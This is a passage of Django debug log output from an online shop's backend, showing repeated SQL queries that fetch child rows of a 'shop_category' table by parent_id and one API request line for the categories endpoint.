"shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 06:16:10,344 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:16:10,346 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:16:10,351 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 06:16:10,354 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:16:10,357 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:16:10,360 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:16:10,363 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:16:10,365 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 06:16:10,369 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:16:10,372 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 06:16:10,374 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:16:10,377 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:16:10,380 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:16:10,386 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:16:10,390 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:16:10,393 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:16:10,397 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:16:10,400 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:16:10,404 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:16:10,407 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:16:10,409 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:16:10,411 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:16:10,413 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:16:10,416 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:16:10,419 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:16:10,421 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:16:10,423 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:16:10,426 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:16:10,429 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 06:16:10] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 06:16:15,821 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 06:16:15,829 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:16:15,832 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:16:15,834 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 06:16:15,837 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:16:15,839 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:16:15,842 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:16:15,844 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:16:15,846 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 06:16:15,849 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:16:15,851 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:16:15,854 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:16:15,856 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:16:15,858 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:16:15,861 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:16:15,864 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:16:15,866 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 06:16:15,868 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:16:15,870 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:16:15,874 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 06:16:15,876 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:16:15,878 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:16:15,880 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:16:15,882 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:16:15,884 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 06:16:15,888 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:16:15,890 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 06:16:15,892 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:16:15,894 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:16:15,896 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:16:15,899 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:16:15,902 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:16:15,904 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:16:15,906 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:16:15,908 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:16:15,912 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:16:15,914 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:16:15,916 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, 